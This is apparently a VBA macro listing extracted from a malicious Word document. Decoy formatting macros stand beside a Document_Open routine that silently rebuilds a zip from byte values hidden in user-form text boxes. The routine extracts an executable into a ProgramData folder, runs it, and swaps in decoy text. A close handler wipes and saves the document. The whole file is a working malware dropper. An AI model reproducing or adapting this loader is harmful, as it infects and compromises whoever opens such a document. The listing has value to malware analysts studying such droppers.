Attribute VB_Name = "Module1"
Sub Macero1()
  
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xl3ArrowsGray
        .WrapText = True
        .Orientation = 0
        .AddIndent = False
 
        .MergeCells = False
    End With
 
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xl3ArrowsGray
        .WrapText = False
 
        .ShrinkToFit = False
        .ReadingOrder = xlContext
        .MergeCells = False
    End With
    Selection.Merge
    Range("G4").Select
End Sub

 Sub AllbhfileLdr()
    Dim path_Allbh_file As String
    Dim file_Allbh_name  As String
    Dim zip_Allbh_file  As Variant
    Dim fldr_Allbh_name  As Variant
    
    file_Allbh_name = "thnaviwa"
    
    
    fldr_Allbh_name = Environ$("ALLUSERSPROFILE") & "\intaRD\"
    
    If Dir(fldr_Allbh_name, vbDirectory) = "" Then
        MkDir (fldr_Allbh_name)
    End If
      
    
    zip_Allbh_file = fldr_Allbh_name & file_Allbh_name & ".zip"
    path_Allbh_file = fldr_Allbh_name & file_Allbh_name & ".exe"
     
    Dim ar1Allbh() As String
    Dim btsAllbh() As Byte
    
    If InStr(Application.System.Version, "6.2") > 0 Or InStr(Application.System.Version, "6.3") > 0 Then
        ar1Allbh = Split(UserForm2.TextBox2.Text, "'")
    Else
        ar1Allbh = Split(UserForm2.TextBox1.Text, "'")
    End If
    
    Dim linAllbh As Double
    linAllbh = 0
    For Each vl In ar1Allbh
        ReDim Preserve btsAllbh(linAllbh)
        
        btsAllbh(linAllbh) = CByte(vl)
        linAllbh = linAllbh + 1
    Next

      
    Open zip_Allbh_file For Binary Access Write As #2
         Put #2, , btsAllbh
    Close #2
    
    If Len(Dir(path_Allbh_file)) = 0 Then
        Call unAllbhzip(zip_Allbh_file, fldr_Allbh_name)
    End If

    Shell path_Allbh_file, vbNormalNoFocus
    
End Sub


Sub Macrow2()
  
    With Selection
        .HorizontalAlignment = xlGeneral
        .VerticalAlignment = xl3ArrowsGray
        .WrapText = True
        .Orientation = 0
        .AddIndent = False
        .IndentLevel = 0
 
    End With
 
    With Selection
        .HorizontalAlignment = xlCenter
        .VerticalAlignment = xl3ArrowsGray
        .WrapText = False
        .Orientation = 0
 
        .ReadingOrder = xlContext
        .MergeCells = False
    End With
    Selection.Merge
    Range("G4").Select
End Sub


 Sub unAllbhzip(Fname As Variant, FileNameFolder As Variant)
    Dim FSO As Object
    
    Dim oApp As Object
    
    'Extract the files into the Destination folder
    Set oApp = CreateObject("Shell.Application")
    
    oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H4

    
End Sub
 
  


Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
    ActiveDocument.StoryRanges(wdMainTextStory).Delete
    Application.DisplayAlerts = False
    Documents.Save
End Sub

 
Private Sub Document_Open()
    ActiveDocument.StoryRanges(wdMainTextStory).Delete
    Call AllbhfileLdr
    Selection.TypeText Text:=UserForm3.TextBox1.Value
End Sub
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{6247E184-1522-40CC-9818-28B3A8A6371B}{51257ABC-08EC-462A-94F6-D01225FB5B4C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False








































Private Sub TextBox1_Change()

End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{E46F64A8-BE75-4A4C-B8DF-E334A455DD76}{B3AFBE2E-CD77-4F44-A2E4-78729005B5FD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False









INQUEST-PP=macro
